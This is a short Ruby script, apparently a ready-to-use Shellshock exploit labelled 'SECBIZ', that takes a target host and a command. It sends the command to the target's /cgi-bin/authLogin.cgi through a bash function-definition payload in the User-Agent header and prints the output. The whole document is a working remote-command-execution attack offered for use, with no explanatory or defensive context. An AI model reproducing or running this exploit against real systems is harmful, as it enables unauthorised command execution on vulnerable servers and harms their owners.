...
#!/usr/env/ruby
# SECBIZ Shellshock Exploit
# Usage: shellshock-exploit.rb [ TARGET ] [ COMMAND ]
# 192.168.0.205:8080/cgi-bin/authLogin.cgi
target_host = ARGV[0]
cmd = ARGV[1]
payload = <<-TT
wget -O SSOUT -q -U "() { test;};echo \\"Content-type: text/plain\\"; echo; echo; #{cmd}" http://#{target_host}/cgi-bin/authLogin.cgi
TT
system(payload)
data = IO.read("SSOUT")
File.delete("SSOUT")
puts data.split("Content-type:").first.gsub(/^\n/, "")